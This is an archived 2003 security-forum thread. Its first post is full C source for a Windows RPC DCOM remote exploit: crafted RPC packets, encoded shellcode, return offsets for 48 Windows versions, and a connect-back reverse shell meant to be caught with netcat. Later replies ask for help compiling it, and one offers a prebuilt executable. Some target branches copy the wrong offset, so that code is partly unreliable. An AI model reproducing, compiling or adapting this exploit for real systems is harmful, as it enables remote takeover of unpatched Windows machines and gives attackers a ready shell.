Windows Rpc Dcom Remote Exploit With 48 Targets

Help - Search - Member List - Calendar

Full Version: Windows Rpc Dcom Remote Exploit With 48 Targets

GovernmentSecurity.org > The Archives > Exploit Articles

Black_hat

Aug 4 2003, 02:38 AM

!!!!

Black_Hat

QUOTE

//////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
//
// English - French - Chinese - Polish - German
// Japanese - Korean - Mexican - Kenyan
//
// Tks to all wolrd wide contributors (Public Property)
//
// New Targets ? contrib@k-otik.com
//
//////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

#define DWORD unsigned long
WSADATA wsa;

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

/* Myam add OFFSETS*/

char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[] = "\xfb\x7b\xa1\x71";

/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29

"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //??????????

"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;

unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;

DWORD cb;

WSAStartup(MAKEWORD(2,0),&wsa);

printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");

if(argc<5)
{

printf("[<$>] RPC Remote Windows Exploit\n");
printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
printf("[<$>] Thanks to b@digitalwaste.org + J?_Haa?outiir \n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 WinNT English +sp4\n");
printf("[<$>] 1 WinNT China +sp5\n");
printf("[<$>] 2 WinNT China +sp6\n");
printf("[<$>] 3 WinNT China +sp6a\n");
printf("[<$>] 4 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 5 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 6 Win2k Spanish +sp4\n");
printf("[<$>] 7 Win2k English nosp 1\n");
printf("[<$>] 8 Win2k English nosp 2\n");
printf("[<$>] 9 Win2k English +sp1\n");
printf("[<$>] 10 Win2k English +sp2 1\n");
printf("[<$>] 11 Win2k English +sp2 2\n");
printf("[<$>] 12 Win2k English +sp3 1\n");
printf("[<$>] 13 Win2k English +sp3 2\n");
printf("[<$>] 14 Win2k English +sp4\n");
printf("[<$>] 15 Win2k China nosp\n");
printf("[<$>] 16 Win2k China +sp1\n");
printf("[<$>] 17 Win2k China +sp2\n");
printf("[<$>] 18 Win2k China +sp3\n");
printf("[<$>] 19 Win2k China +sp4\n");
printf("[<$>] 20 Win2k German +sp3\n");
printf("[<$>] 21 Win2k Japanese nosp\n");
printf("[<$>] 22 Win2k Japanese +sp1\n");
printf("[<$>] 23 Win2k Japanese +sp2\n");
printf("[<$>] 24 Win2k Korea nosp\n");
printf("[<$>] 25 Win2k Korea +sp1\n");
printf("[<$>] 26 Win2k Korea +sp2\n");
printf("[<$>] 27 Win2k Mexican nosp\n");
printf("[<$>] 28 Win2k Mexican +sp1\n");
printf("[<$>] 29 Win2k Kenya nosp\n");
printf("[<$>] 30 Win2k Kenya +sp1\n");
printf("[<$>] 31 Win2k Kenya +sp2\n");
printf("[<$>] 32 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 33 WinXP English +sp1 1\n");
printf("[<$>] 34 WinXP English +sp1 2\n");
printf("[<$>] 35 WinXP English +sp2\n");
printf("[<$>] 36 Win2k3 English nosp\n");
printf("[<$>] 37 Win2k german sp3\n");
printf("[<$>] 38 Win2k german sp4\n");
printf("[<$>] 39 Win2k german sp4 2\n");
printf("[<$>] 40 Winxp german sp1 2\n");
printf("[<$>] 41 Win2k french sp1\n");
printf("[<$>] 42 Win2k french sp4\n");
printf("[<$>] 43 Winxp french sp0\n");
printf("[<$>] 44 Winxp french sp1\n");
printf("[<$>] 45 Win2k big5 sp3\n");
printf("[<$>] 46 Win2k big5 sp4\n");
printf("[<$>] 47 Winxp big5 sp0\n");

exit(1);
}

if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}

if(atoi(argv[4])==0)

memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
else if (atoi(argv[4])==1)
memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
else if (atoi(argv[4])==2)
memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
else if (atoi(argv[4])==3)
memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==15)
memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
else if (atoi(argv[4])==16)
memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
else if (atoi(argv[4])==17)
memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
else if (atoi(argv[4])==18)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==19)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==20)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==21)
memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
else if (atoi(argv[4])==22)
memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
else if (atoi(argv[4])==23)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==24)
memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
else if (atoi(argv[4])==25)
memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
else if (atoi(argv[4])==26)
memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
else if (atoi(argv[4])==27)
memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
else if (atoi(argv[4])==28)
memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
else if (atoi(argv[4])==29)
memcpy(sc+36,win2knospken,sizeof(win2knospken));
else if (atoi(argv[4])==30)
memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
else if (atoi(argv[4])==31)
memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
else if (atoi(argv[4])==32)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==33)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==34)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==35)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
else if (atoi(argv[4])==36)
memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
else if (atoi(argv[4])==37)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
else if (atoi(argv[4])==38)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
else if (atoi(argv[4])==39)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
else if (atoi(argv[4])==40)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
else if (atoi(argv[4])==41)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
else if (atoi(argv[4])==42)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
else if (atoi(argv[4])==43)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
else if (atoi(argv[4])==44)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
else if (atoi(argv[4])==45)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
else if (atoi(argv[4])==46)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
else if (atoi(argv[4])==47)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));

port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]);
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

len=recv(sockfd,buf1,1000,0);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
exit (1);
}
len=recv(sockfd,buf1,1024,0);
return 0;
}

virus

Aug 4 2003, 07:02 AM

many thanks

ZmooZa

Aug 4 2003, 11:48 AM

Anyone got it compiled already ?
Can't get it working with Bloodshed Dev-C++ 5 ...

woutiir

Aug 4 2003, 11:53 AM

Ok this should work, cuz i've helped with this exploit as you can see:

QUOTE

printf("[<$>] Thanks to b@digitalwaste.org + J?_Haa?outiir \n");

But get the original here:
http://www.k-otik.net/exploits/07.30.dcom48.c

It works with visual 6.

Lemme know when problems occur.

Greetings, woutiir

Black_hat

Aug 4 2003, 02:14 PM

QUOTE

But get the original here

and my last posted was orginal Version !
Tanx

Black_Hat

DJohn84

Aug 4 2003, 11:47 PM

I too cant compile with Bloodshed :\

w00dy

Aug 5 2003, 01:35 AM

gcc is far superior to bloodshed

Try using that

DJohn84

Aug 6 2003, 02:03 AM

I tried gcc too. Still couldnt get it to compile :\

woutiir

Aug 6 2003, 12:29 PM

Try Visual c++ it must work, otherwise something is really fucked. I got it to work here, please be aware its using windows libaries. so compiling under linux is kinda useless.

Good luck,
woutiir

woutiir

Aug 6 2003, 12:40 PM

I could upload the .exe also, but i can't attachfiles at this forum?

Gr. woutiir

woutiir

Aug 6 2003, 12:44 PM

Ok i found a way, i uploaded it into the file download section. Have a look there.

Good luck

woutiir

DJohn84

Aug 7 2003, 04:20 AM

Much thanks. I'll try to get ahold of visual C++

Droezel

Aug 7 2003, 12:04 PM

Question:

To add a duch OS to this code would this be right?

